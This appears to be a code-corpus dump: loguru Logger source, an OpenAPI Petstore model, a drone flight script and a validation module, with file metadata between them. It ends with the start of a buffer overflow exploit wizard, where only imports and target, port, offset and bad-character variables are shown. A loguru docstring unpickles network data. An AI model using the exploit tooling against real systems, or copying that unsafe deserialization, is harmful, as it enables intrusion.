log message. It could be an |Exception| object or a ``(type, value, traceback)`` tuple,
otherwise the exception information is retrieved from |sys.exc_info|.
record : |bool|, optional
If ``True``, the record dict contextualizing the logging call can be used to format the
message by using ``{record[key]}`` in the log message.
lazy : |bool|, optional
If ``True``, the logging call attribute to format the message should be functions which
will be called only if the level is high enough. This can be used to avoid expensive
functions if not necessary.
colors : |bool|, optional
If ``True``, logged message will be colorized according to the markups it possibly
contains.
raw : |bool|, optional
If ``True``, the formatting of each sink will be bypassed and the message will be sent
as is.
capture : |bool|, optional
If ``False``, the ``**kwargs`` of logged message will not automatically populate
the ``extra`` dict (although they are still used for formatting).
depth : |int|, optional
Specify which stacktrace should be used to contextualize the logged message. This is
useful while using the logger from inside a wrapped function to retrieve worthwhile
information.
ansi : |bool|, optional
Deprecated since version 0.4.1: the ``ansi`` parameter will be removed in Loguru 1.0.0,
it is replaced by ``colors`` which is a more appropriate name.
Returns
-------
:class:`~Logger`
A logger wrapping the core logger, but transforming logged message adequately before
sending.
Examples
--------
>>> try:
... 1 / 0
... except ZeroDivisionError:
... logger.opt(exception=True).debug("Exception logged with debug level:")
...
[18:10:02] DEBUG in '<module>' - Exception logged with debug level:
Traceback (most recent call last, catch point marked):
> File "<stdin>", line 2, in <module>
ZeroDivisionError: division by zero
>>> logger.opt(record=True).info("Current line is: {record[line]}")
[18:10:33] INFO in '<module>' - Current line is: 1
>>> logger.opt(lazy=True).debug("If sink <= DEBUG: {x}", x=lambda: math.factorial(2**5))
[18:11:19] DEBUG in '<module>' - If sink <= DEBUG: 263130836933693530167218012160000000
>>> logger.opt(colors=True).warning("We got a <red>BIG</red> problem")
[18:11:30] WARNING in '<module>' - We got a BIG problem
>>> logger.opt(raw=True).debug("No formatting\n")
No formatting
>>> logger.opt(capture=False).info("Displayed but not captured: {value}", value=123)
[18:11:41] Displayed but not captured: 123
>>> def wrapped():
... logger.opt(depth=1).info("Get parent context")
...
>>> def func():
... wrapped()
...
>>> func()
[18:11:54] DEBUG in 'func' - Get parent context
"""
if ansi:
colors = True
warnings.warn(
"The 'ansi' parameter is deprecated, please use 'colors' instead",
DeprecationWarning,
)
args = self._options[-2:]
return Logger(self._core, exception, depth, record, lazy, colors, raw, capture, *args)
def bind(__self, **kwargs):
"""Bind attributes to the ``extra`` dict of each logged message record.
This is used to add custom context to each logging call.
Parameters
----------
**kwargs
Mapping between keys and values that will be added to the ``extra`` dict.
Returns
-------
:class:`~Logger`
A logger wrapping the core logger, but which sends record with the customized ``extra``
dict.
Examples
--------
>>> logger.add(sys.stderr, format="{extra[ip]} - {message}")
>>> class Server:
... def __init__(self, ip):
... self.ip = ip
... self.logger = logger.bind(ip=ip)
... def call(self, message):
... self.logger.info(message)
...
>>> instance_1 = Server("192.168.0.200")
>>> instance_2 = Server("127.0.0.1")
>>> instance_1.call("First instance")
192.168.0.200 - First instance
>>> instance_2.call("Second instance")
127.0.0.1 - Second instance
"""
*options, extra = __self._options
return Logger(__self._core, *options, {**extra, **kwargs})
@contextlib.contextmanager
def contextualize(__self, **kwargs):
"""Bind attributes to the context-local ``extra`` dict while inside the ``with`` block.
Contrary to |bind| there is no ``logger`` returned, the ``extra`` dict is modified in-place
and updated globally. Most importantly, it uses |contextvars| which means that
contextualized values are unique to each threads and asynchronous tasks.
The ``extra`` dict will retrieve its initial state once the context manager is exited.
Parameters
----------
**kwargs
Mapping between keys and values that will be added to the context-local ``extra`` dict.
Returns
-------
:term:`context manager` / :term:`decorator`
A context manager (usable as a decorator too) that will bind the attributes once entered
and restore the initial state of the ``extra`` dict while exited.
Examples
--------
>>> logger.add(sys.stderr, format="{message} | {extra}")
1
>>> def task():
... logger.info("Processing!")
...
>>> with logger.contextualize(task_id=123):
... task()
...
Processing! | {'task_id': 123}
>>> logger.info("Done.")
Done. | {}
"""
with __self._core.lock:
new_context = {**context.get(), **kwargs}
token = context.set(new_context)
try:
yield
finally:
with __self._core.lock:
context.reset(token)
def patch(self, patcher):
"""Attach a function to modify the record dict created by each logging call.
The ``patcher`` may be used to update the record on-the-fly before it's propagated to the
handlers. This allows the "extra" dict to be populated with dynamic values and also permits
advanced modifications of the record emitted while logging a message. The function is called
once before sending the log message to the different handlers.
It is recommended to apply modification on the ``record["extra"]`` dict rather than on the
``record`` dict itself, as some values are used internally by `Loguru`, and modify them may
produce unexpected results.
Parameters
----------
patcher: |callable|_
The function to which the record dict will be passed as the sole argument. This function
is in charge of updating the record in-place, the function does not need to return any
value, the modified record object will be re-used.
Returns
-------
:class:`~Logger`
A logger wrapping the core logger, but which records are passed through the ``patcher``
function before being sent to the added handlers.
Examples
--------
>>> logger.add(sys.stderr, format="{extra[utc]} {message}")
>>> logger = logger.patch(lambda record: record["extra"].update(utc=datetime.utcnow())
>>> logger.info("That's way, you can log messages with time displayed in UTC")
>>> def wrapper(func):
... @functools.wraps(func)
... def wrapped(*args, **kwargs):
... logger.patch(lambda r: r.update(function=func.__name__)).info("Wrapped!")
... return func(*args, **kwargs)
... return wrapped
>>> def recv_record_from_network(pipe):
... record = pickle.loads(pipe.read())
... level, message = record["level"], record["message"]
... logger.patch(lambda r: r.update(record)).log(level, message)
"""
*options, _, extra = self._options
return Logger(self._core, *options, patcher, extra)
def level(self, name, no=None, color=None, icon=None):
"""Add, update or retrieve a logging level.
Logging levels are defined by their ``name`` to which a severity ``no``, an ansi ``color``
tag and an ``icon`` are associated and possibly modified at run-time. To |log| to a custom
level, you should necessarily use its name, the severity number is not linked back to levels
name (this implies that several levels can share the same severity).
To add a new level, its ``name`` and its ``no`` are required. A ``color`` and an ``icon``
can also be specified or will be empty by default.
To update an existing level, pass its ``name`` with the parameters to be changed. It is not
possible to modify the ``no`` of a level once it has been added.
To retrieve level information, the ``name`` solely suffices.
Parameters
----------
name : |str|
The name of the logging level.
no : |int|
The severity of the level to be added or updated.
color : |str|
The color markup of the level to be added or updated.
icon : |str|
The icon of the level to be added or updated.
Returns
-------
``Level``
A |namedtuple| containing information about the level.
Raises
------
ValueError
If there is no level registered with such ``name``.
Examples
--------
>>> level = logger.level("ERROR")
>>> print(level)
Level(name='ERROR', no=40, color='<red><bold>', icon='❌')
>>> logger.add(sys.stderr, format="{level.no} {level.icon} {message}")
1
>>> logger.level("CUSTOM", no=15, color="<blue>", icon="@")
Level(name='CUSTOM', no=15, color='<blue>', icon='@')
>>> logger.log("CUSTOM", "Logging...")
15 @ Logging...
>>> logger.level("WARNING", icon=r"/!\\")
Level(name='WARNING', no=30, color='<yellow><bold>', icon='/!\\\\')
>>> logger.warning("Updated!")
30 /!\\ Updated!
"""
if not isinstance(name, str):
raise TypeError(
"Invalid level name, it should be a string, not: '%s'" % type(name).__name__
)
if no is color is icon is None:
try:
return self._core.levels[name]
except KeyError:
raise ValueError("Level '%s' does not exist" % name) from None
if name not in self._core.levels:
if no is None:
raise ValueError(
"Level '%s' does not exist, you have to create it by specifying a level no"
% name
)
else:
old_color, old_icon = "", " "
elif no is not None:
raise TypeError("Level '%s' already exists, you can't update its severity no" % name)
else:
_, no, old_color, old_icon = self.level(name)
if color is None:
color = old_color
if icon is None:
icon = old_icon
if not isinstance(no, int):
raise TypeError(
"Invalid level no, it should be an integer, not: '%s'" % type(no).__name__
)
if no < 0:
raise ValueError("Invalid level no, it should be a positive integer, not: %d" % no)
ansi = Colorizer.ansify(color)
level = Level(name, no, color, icon)
with self._core.lock:
self._core.levels[name] = level
self._core.levels_ansi_codes[name] = ansi
for handler in self._core.handlers.values():
handler.update_format(name)
return level
def disable(self, name):
"""Disable logging of messages coming from ``name`` module and its children.
Developers of library using `Loguru` should absolutely disable it to avoid disrupting
users with unrelated logs messages.
Note that in some rare circumstances, it is not possible for `Loguru` to
determine the module's ``__name__`` value. In such situation, ``record["name"]`` will be
equal to ``None``, this is why ``None`` is also a valid argument.
Parameters
----------
name : |str| or ``None``
The name of the parent module to disable.
Examples
--------
>>> logger.info("Allowed message by default")
[22:21:55] Allowed message by default
>>> logger.disable("my_library")
>>> logger.info("While publishing a library, don't forget to disable logging")
"""
self._change_activation(name, False)
def enable(self, name):
"""Enable logging of messages coming from ``name`` module and its children.
Logging is generally disabled by imported library using `Loguru`, hence this function
allows users to receive these messages anyway.
To enable all logs regardless of the module they are coming from, an empty string ``""`` can
be passed.
Parameters
----------
name : |str| or ``None``
The name of the parent module to re-allow.
Examples
--------
>>> logger.disable("__main__")
>>> logger.info("Disabled, so nothing is logged.")
>>> logger.enable("__main__")
>>> logger.info("Re-enabled, messages are logged.")
[22:46:12] Re-enabled, messages are logged.
"""
self._change_activation(name, True)
def configure(self, *, handlers=None, levels=None, extra=None, patcher=None, activation=None):
"""Configure the core logger.
It should be noted that ``extra`` values set using this function are available across all
modules, so this is the best way to set overall default values.
Parameters
----------
handlers : |list| of |dict|, optional
A list of each handler to be added. The list should contain dicts of params passed to
the |add| function as keyword arguments. If not ``None``, all previously added
handlers are first removed.
levels : |list| of |dict|, optional
A list of each level to be added or updated. The list should contain dicts of params
passed to the |level| function as keyword arguments. This will never remove previously
created levels.
extra : |dict|, optional
A dict containing additional parameters bound to the core logger, useful to share
common properties if you call |bind| in several of your files modules. If not ``None``,
this will remove previously configured ``extra`` dict.
patcher : |callable|_, optional
A function that will be applied to the record dict of each logged messages across all
modules using the logger. It should modify the dict in-place without returning anything.
The function is executed prior to the one possibly added by the |patch| method. If not
``None``, this will replace previously configured ``patcher`` function.
activation : |list| of |tuple|, optional
A list of ``(name, state)`` tuples which denotes which loggers should be enabled (if
``state`` is ``True``) or disabled (if ``state`` is ``False``). The calls to |enable|
and |disable| are made accordingly to the list order. This will not modify previously
activated loggers, so if you need a fresh start prepend your list with ``("", False)``
or ``("", True)``.
Returns
-------
:class:`list` of :class:`int`
A list containing the identifiers of added sinks (if any).
Examples
--------
>>> logger.configure(
... handlers=[
... dict(sink=sys.stderr, format="[{time}] {message}"),
... dict(sink="file.log", enqueue=True, serialize=True),
... ],
... levels=[dict(name="NEW", no=13, icon="¤", color="")],
... extra={"common_to_all": "default"},
... patcher=lambda record: record["extra"].update(some_value=42),
... activation=[("my_module.secret", False), ("another_library.module", True)],
... )
[1, 2]
>>> # Set a default "extra" dict to logger across all modules, without "bind()"
>>> extra = {"context": "foo"}
>>> logger.configure(extra=extra)
>>> logger.add(sys.stderr, format="{extra[context]} - {message}")
>>> logger.info("Context without bind")
>>> # => "foo - Context without bind"
>>> logger.bind(context="bar").info("Suppress global context")
>>> # => "bar - Suppress global context"
"""
if handlers is not None:
self.remove()
else:
handlers = []
if levels is not None:
for params in levels:
self.level(**params)
if patcher is not None:
with self._core.lock:
self._core.patcher = patcher
if extra is not None:
with self._core.lock:
self._core.extra.clear()
self._core.extra.update(extra)
if activation is not None:
for name, state in activation:
if state:
self.enable(name)
else:
self.disable(name)
return [self.add(**params) for params in handlers]
def _change_activation(self, name, status):
if not (name is None or isinstance(name, str)):
raise TypeError(
"Invalid name, it should be a string (or None), not: '%s'" % type(name).__name__
)
with self._core.lock:
enabled = self._core.enabled.copy()
if name is None:
for n in enabled:
if n is None:
enabled[n] = status
self._core.activation_none = status
self._core.enabled = enabled
return
if name != "":
name += "."
activation_list = [
(n, s) for n, s in self._core.activation_list if n[: len(name)] != name
]
parent_status = next((s for n, s in activation_list if name[: len(n)] == n), None)
if parent_status != status and not (name == "" and status is True):
activation_list.append((name, status))
def modules_depth(x):
return x[0].count(".")
activation_list.sort(key=modules_depth, reverse=True)
for n in enabled:
if n is not None and (n + ".")[: len(name)] == name:
enabled[n] = status
self._core.activation_list = activation_list
self._core.enabled = enabled
@staticmethod
def parse(file, pattern, *, cast={}, chunk=2 ** 16):
"""Parse raw logs and extract each entry as a |dict|.
The logging format has to be specified as the regex ``pattern``, it will then be
used to parse the ``file`` and retrieve each entry based on the named groups present
in the regex.
Parameters
----------
file : |str|, |Path| or |file-like object|_
The path of the log file to be parsed, or an already opened file object.
pattern : |str| or |re.Pattern|_
The regex to use for logs parsing, it should contain named groups which will be included
in the returned dict.
cast : |callable|_ or |dict|, optional
A function that should convert in-place the regex groups parsed (a dict of string
values) to more appropriate types. If a dict is passed, it should be a mapping between
keys of parsed log dict and the function that should be used to convert the associated
value.
chunk : |int|, optional
The number of bytes read while iterating through the logs, this avoids having to load
the whole file in memory.
Yields
------
:class:`dict`
The dict mapping regex named groups to matched values, as returned by |match.groupdict|
and optionally converted according to ``cast`` argument.
Examples
--------
>>> reg = r"(?P<lvl>[0-9]+): (?P<msg>.*)" # If log format is "{level.no} - {message}"
>>> for e in logger.parse("file.log", reg): # A file line could be "10 - A debug message"
... print(e) # => {'lvl': '10', 'msg': 'A debug message'}
>>> caster = dict(lvl=int) # Parse 'lvl' key as an integer
>>> for e in logger.parse("file.log", reg, cast=caster):
... print(e) # => {'lvl': 10, 'msg': 'A debug message'}
>>> def cast(groups):
... if "date" in groups:
... groups["date"] = datetime.strptime(groups["date"], "%Y-%m-%d %H:%M:%S")
...
>>> with open("file.log") as file:
... for log in logger.parse(file, reg, cast=cast):
... print(log["date"], log["something_else"])
"""
if isinstance(file, (str, PathLike)):
should_close = True
fileobj = open(str(file))
elif hasattr(file, "read") and callable(file.read):
should_close = False
fileobj = file
else:
raise TypeError(
"Invalid file, it should be a string path or a file object, not: '%s'"
% type(file).__name__
)
if isinstance(cast, dict):
def cast_function(groups):
for key, converter in cast.items():
if key in groups:
groups[key] = converter(groups[key])
elif callable(cast):
cast_function = cast
else:
raise TypeError(
"Invalid cast, it should be a function or a dict, not: '%s'" % type(cast).__name__
)
try:
regex = re.compile(pattern)
except TypeError:
raise TypeError(
"Invalid pattern, it should be a string or a compiled regex, not: '%s'"
% type(pattern).__name__
) from None
matches = Logger._find_iter(fileobj, regex, chunk)
for match in matches:
groups = match.groupdict()
cast_function(groups)
yield groups
if should_close:
fileobj.close()
@staticmethod
def _find_iter(fileobj, regex, chunk):
buffer = fileobj.read(0)
while 1:
text = fileobj.read(chunk)
buffer += text
matches = list(regex.finditer(buffer))
if not text:
yield from matches
break
if len(matches) > 1:
end = matches[-2].end()
buffer = buffer[end:]
yield from matches[:-1]
def _log(self, level_id, static_level_no, from_decorator, options, message, args, kwargs):
core = self._core
if not core.handlers:
return
(exception, depth, record, lazy, colors, raw, capture, patcher, extra) = options
frame = get_frame(depth + 2)
try:
name = frame.f_globals["__name__"]
except KeyError:
name = None
try:
if not core.enabled[name]:
return
except KeyError:
enabled = core.enabled
if name is None:
status = core.activation_none
enabled[name] = status
if not status:
return
else:
dotted_name = name + "."
for dotted_module_name, status in core.activation_list:
if dotted_name[: len(dotted_module_name)] == dotted_module_name:
if status:
break
enabled[name] = False
return
enabled[name] = True
current_datetime = aware_now()
if level_id is None:
level_icon = " "
level_no = static_level_no
level_name = "Level %d" % level_no
else:
try:
level_name, level_no, _, level_icon = core.levels[level_id]
except KeyError:
raise ValueError("Level '%s' does not exist" % level_id) from None
if level_no < core.min_level:
return
code = frame.f_code
file_path = code.co_filename
file_name = basename(file_path)
thread = current_thread()
process = current_process()
elapsed = current_datetime - start_time
if exception:
if isinstance(exception, BaseException):
type_, value, traceback = (type(exception), exception, exception.__traceback__)
elif isinstance(exception, tuple):
type_, value, traceback = exception
else:
type_, value, traceback = sys.exc_info()
exception = RecordException(type_, value, traceback)
else:
exception = None
log_record = {
"elapsed": elapsed,
"exception": exception,
"extra": {**core.extra, **context.get(), **extra},
"file": RecordFile(file_name, file_path),
"function": code.co_name,
"level": RecordLevel(level_name, level_no, level_icon),
"line": frame.f_lineno,
"message": str(message),
"module": splitext(file_name)[0],
"name": name,
"process": RecordProcess(process.ident, process.name),
"thread": RecordThread(thread.ident, thread.name),
"time": current_datetime,
}
if lazy:
args = [arg() for arg in args]
kwargs = {key: value() for key, value in kwargs.items()}
if capture and kwargs:
log_record["extra"].update(kwargs)
if record:
if "record" in kwargs:
raise TypeError(
"The message can't be formatted: 'record' shall not be used as a keyword "
"argument while logger has been configured with '.opt(record=True)'"
)
kwargs.update(record=log_record)
if colors:
if args or kwargs:
colored_message = Colorizer.prepare_message(message, args, kwargs)
else:
colored_message = Colorizer.prepare_simple_message(str(message))
log_record["message"] = colored_message.stripped
elif args or kwargs:
colored_message = None
log_record["message"] = message.format(*args, **kwargs)
else:
colored_message = None
if core.patcher:
core.patcher(log_record)
if patcher:
patcher(log_record)
for handler in core.handlers.values():
handler.emit(log_record, level_id, from_decorator, raw, colored_message)
def trace(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'TRACE'``."""
__self._log("TRACE", None, False, __self._options, __message, args, kwargs)
def debug(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'DEBUG'``."""
__self._log("DEBUG", None, False, __self._options, __message, args, kwargs)
def info(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'INFO'``."""
__self._log("INFO", None, False, __self._options, __message, args, kwargs)
def success(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'SUCCESS'``."""
__self._log("SUCCESS", None, False, __self._options, __message, args, kwargs)
def warning(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'WARNING'``."""
__self._log("WARNING", None, False, __self._options, __message, args, kwargs)
def error(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'ERROR'``."""
__self._log("ERROR", None, False, __self._options, __message, args, kwargs)
def critical(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'CRITICAL'``."""
__self._log("CRITICAL", None, False, __self._options, __message, args, kwargs)
def exception(__self, __message, *args, **kwargs):
r"""Convenience method for logging an ``'ERROR'`` with exception information."""
options = (True,) + __self._options[1:]
__self._log("ERROR", None, False, options, __message, args, kwargs)
def log(__self, __level, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``level``."""
level_id, static_level_no = __self._dynamic_level(__level)
__self._log(level_id, static_level_no, False, __self._options, __message, args, kwargs)
@staticmethod
@functools.lru_cache(maxsize=32)
def _dynamic_level(level):
if isinstance(level, str):
return (level, None)
if isinstance(level, int):
if level < 0:
raise ValueError(
"Invalid level value, it should be a positive integer, not: %d" % level
)
return (None, level)
raise TypeError(
"Invalid level, it should be an integer or a string, not: '%s'" % type(level).__name__
)
def start(self, *args, **kwargs):
"""Deprecated function to |add| a new handler.
Warnings
--------
.. deprecated:: 0.2.2
``start()`` will be removed in Loguru 1.0.0, it is replaced by ``add()`` which is a less
confusing name.
"""
warnings.warn(
"The 'start()' method is deprecated, please use 'add()' instead", DeprecationWarning
)
return self.add(*args, **kwargs)
def stop(self, *args, **kwargs):
"""Deprecated function to |remove| an existing handler.
Warnings
--------
.. deprecated:: 0.2.2
``stop()`` will be removed in Loguru 1.0.0, it is replaced by ``remove()`` which is a less
confusing name.
"""
warnings.warn(
"The 'stop()' method is deprecated, please use 'remove()' instead", DeprecationWarning
)
return self.remove(*args, **kwargs)
| 45.302882
| 100
| 0.513301
|
4a1129432f547f0030c5ef80aabd87c86aff60d3
| 9,054
|
py
|
Python
|
samples/openapi3/client/petstore/python/petstore_api/model/composed_one_of_number_with_validations.py
|
mkj-is/openapi-generator
|
71a8e0afda1e2a0876d166b8dba4c7ba0fe0a5a5
|
[
"Apache-2.0"
] | 4
|
2021-02-20T21:39:04.000Z
|
2021-08-24T13:54:15.000Z
|
samples/openapi3/client/petstore/python/petstore_api/model/composed_one_of_number_with_validations.py
|
mkj-is/openapi-generator
|
71a8e0afda1e2a0876d166b8dba4c7ba0fe0a5a5
|
[
"Apache-2.0"
] | 27
|
2021-04-07T07:22:02.000Z
|
2022-03-31T05:10:11.000Z
|
samples/openapi3/client/petstore/python/petstore_api/model/composed_one_of_number_with_validations.py
|
mkj-is/openapi-generator
|
71a8e0afda1e2a0876d166b8dba4c7ba0fe0a5a5
|
[
"Apache-2.0"
] | 2
|
2021-06-11T15:24:43.000Z
|
2021-06-13T12:20:31.000Z
|
"""
OpenAPI Petstore
This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from petstore_api.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from petstore_api.model.animal import Animal
from petstore_api.model.number_with_validations import NumberWithValidations
globals()['Animal'] = Animal
globals()['NumberWithValidations'] = NumberWithValidations
class ComposedOneOfNumberWithValidations(ModelComposed):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'color': (str,), # noqa: E501
'class_name': (str,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'color': 'color', # noqa: E501
'class_name': 'className', # noqa: E501
}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
'_composed_instances',
'_var_name_to_model_instances',
'_additional_properties_model_instances',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""ComposedOneOfNumberWithValidations - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
color (str): [optional] if omitted the server will use the default value of "red" # noqa: E501
class_name (str): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
constant_args = {
'_check_type': _check_type,
'_path_to_item': _path_to_item,
'_spec_property_naming': _spec_property_naming,
'_configuration': _configuration,
'_visited_composed_classes': self._visited_composed_classes,
}
required_args = {
}
model_args = {}
model_args.update(required_args)
model_args.update(kwargs)
composed_info = validate_get_composed_info(
constant_args, model_args, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
unused_args = composed_info[3]
for var_name, var_value in required_args.items():
setattr(self, var_name, var_value)
for var_name, var_value in kwargs.items():
if var_name in unused_args and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
not self._additional_properties_model_instances:
# discard variable.
continue
setattr(self, var_name, var_value)
@cached_property
def _composed_schemas():
# we need this here to make our import statements work
# we must store _composed_schemas in here so the code is only run
# when we invoke this method. If we kept this at the class
# level we would get an error beause the class level
# code would be run when this module is imported, and these composed
# classes don't exist yet because their module has not finished
# loading
lazy_import()
return {
'anyOf': [
],
'allOf': [
],
'oneOf': [
Animal,
NumberWithValidations,
date,
none_type,
],
}
| 39.537118
| 174
| 0.59609
|
4a112963b0e747d944e6b74d4e5aef52b1223fce
| 350
|
py
|
Python
|
MaidenFlight.py
|
IanC95/Master18-fleet-drones
|
f4a06bcbbf991a5ab163a95a458fa0f0a4184d8f
|
[
"MIT"
] | null | null | null |
MaidenFlight.py
|
IanC95/Master18-fleet-drones
|
f4a06bcbbf991a5ab163a95a458fa0f0a4184d8f
|
[
"MIT"
] | null | null | null |
MaidenFlight.py
|
IanC95/Master18-fleet-drones
|
f4a06bcbbf991a5ab163a95a458fa0f0a4184d8f
|
[
"MIT"
] | null | null | null |
import time
import ps_drone
drone = ps_drone.Drone()
drone.startup()
drone.takeoff()
time.sleep(7.5)
drone.moveForward()
time.sleep(1)
drone.stop()
time.sleep(2)
drone.moveBackward(0.25)
time.sleep(1.5)
drone.stop()
time.sleep(2)
drone.setSpeed(1.0)
print drone.setSpeed()
drone.turnLeft()
time.sleep(2)
drone.stop()
time.sleep(2)
drone.land()
| 12.5
| 24
| 0.731429
|
4a1129b7635c437f30c679bb5e1988fda7761ab8
| 1,142
|
py
|
Python
|
bw2regional/validate.py
|
brightway-lca/brightway2-regional-copy
|
6aab66e76992dae89c48d60f13bf9c8baef17420
|
[
"BSD-3-Clause"
] | 1
|
2022-03-02T10:33:39.000Z
|
2022-03-02T10:33:39.000Z
|
bw2regional/validate.py
|
brightway-lca/brightway2-regional-copy
|
6aab66e76992dae89c48d60f13bf9c8baef17420
|
[
"BSD-3-Clause"
] | 3
|
2020-03-03T15:44:56.000Z
|
2021-07-21T13:34:29.000Z
|
bw2regional/validate.py
|
brightway-lca/brightway2-regional-copy
|
6aab66e76992dae89c48d60f13bf9c8baef17420
|
[
"BSD-3-Clause"
] | 1
|
2022-02-14T14:04:51.000Z
|
2022-02-14T14:04:51.000Z
|
from bw2data.validate import maybe_uncertainty, valid_tuple
from voluptuous import Any, Invalid, Schema
_maybe_uncertainty = Schema(maybe_uncertainty)
_loading_value = Schema(Any(str, valid_tuple))
def uncertainty_list(obj):
try:
assert len(obj) == 2
assert isinstance(obj, list)
_maybe_uncertainty(obj[0])
_loading_value(obj[1])
except:
raise Invalid("%s is not a valid loading value" % obj)
return obj
def float_as_last(obj):
try:
assert isinstance(obj, list)
assert len(obj) == 3
assert isinstance(obj[2], (float, int))
except:
raise Invalid("%s is not a valid intersection value" % obj)
return obj
def xtable_data(obj):
try:
assert isinstance(obj, (tuple, list))
assert isinstance(obj[0], float)
assert isinstance(obj[1][0], str)
assert isinstance(obj[1][1], (str, int))
except:
raise Invalid("%s is not a valid xtable value" % obj)
return obj
loading_validator = Schema([uncertainty_list])
intersection_validator = Schema([float_as_last])
xtable_validator = Schema([xtable_data])
| 26.55814
| 67
| 0.662872
|
4a112ae04246320ceefd065a7ad90adcf8f0bf29
| 59,531
|
py
|
Python
|
SimpleBOWizard.py
|
nosce/SimpleBOWizard
|
281d37e82a12a5035be1afb0edf01deccbc9d926
|
[
"MIT"
] | null | null | null |
SimpleBOWizard.py
|
nosce/SimpleBOWizard
|
281d37e82a12a5035be1afb0edf01deccbc9d926
|
[
"MIT"
] | null | null | null |
SimpleBOWizard.py
|
nosce/SimpleBOWizard
|
281d37e82a12a5035be1afb0edf01deccbc9d926
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# =============================================================================
# The SimpleBOWizard guides through all steps required for a simple buffer
# overflow. The user can enter all required information step by step.
# Based on this, the exploit file will be created and updated.
# =============================================================================
# Author : nosce
# Date : February 2020
# License : MIT
# Status : Prototype
# =============================================================================
# -----------------------------------------------------------------------------
# Imports
# -----------------------------------------------------------------------------
from concurrent.futures import ThreadPoolExecutor
import struct
import sys
import time
import os
import re
import shlex
import shutil
import textwrap
import socket as so
import subprocess as sub
from binascii import unhexlify
from fileinput import FileInput
# -----------------------------------------------------------------------------
# Global variables and constants
# -----------------------------------------------------------------------------
_DEFAULT_POOL = ThreadPoolExecutor()
# Formatting for messages -----------------------------------------------------
BOLD = '\033[1m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
RED = '\033[31m'
GRAY = '\033[37m'
CYAN = '\033[36m'
FORMAT_END = '\033[0m'
BLUE_BACK = '\x1b[0;30;44m'
BACK_END = '\x1b[0m'
# Buffer overflow values ------------------------------------------------------
# Global
bo_type = 'local'
current_step = -1
buffer = b''
# Local BO
file_ext = 'py'
file_name = 'exploit'
file = file_name + '.' + file_ext if file_ext else file_name
# Remote BO
target = '127.0.0.1'
port = 80
start_command = b''
end_command = b''
# Fuzzing
fuzz_buffer = []
fuzz_buff_length = 30
fuzz_char = b'A'
increase_step = 200
# Pattern
pattern_length = 2000
# Buffer
buf_length = 2000
offset = 1000
badchars = []
